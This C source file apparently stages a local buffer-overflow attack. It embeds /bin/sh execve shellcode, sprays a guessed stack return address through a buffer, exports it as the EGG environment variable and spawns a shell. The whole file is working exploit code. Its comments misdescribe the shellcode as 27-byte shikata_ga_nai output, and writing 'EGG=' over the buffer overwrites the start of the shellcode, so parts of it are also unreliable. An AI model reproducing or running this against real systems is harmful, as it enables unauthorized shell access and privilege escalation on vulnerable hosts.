shell_exec.c

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

// linux/x86/exec - 27 bytes
// Encoder: x86/shikata_ga_nai
// VERBOSE=false, PrependFork=false, PrependSetresuid=false, 
// PrependSetreuid=false, PrependSetuid=false, 
// PrependSetresgid=false, PrependSetregid=false, 
// PrependSetgid=false, PrependChrootBreak=false, 
// AppendExit=false, CMD=/bin/sh
unsigned char shellcode[] = 
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char **argv) {
    char *buffer, *ptr;
    long *addr_ptr, addr;
    int i, offset=270;
    int bsize=300;
    int csize=strlen(shellcode);

    if (!(buffer = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }

    addr = 0xbffffffa - offset;
    ptr = buffer;
    addr_ptr = (long *) ptr;

    for (i = 0; i < bsize; i+=4)
        *(addr_ptr++) = addr;

    for (i = 0; i < csize; i++)
        buffer[i] = shellcode[i];

    buffer[bsize - 1] = '\0';

    memcpy(buffer,"EGG=",4);
    putenv(buffer);
    system("/bin/sh");

    return 0;
}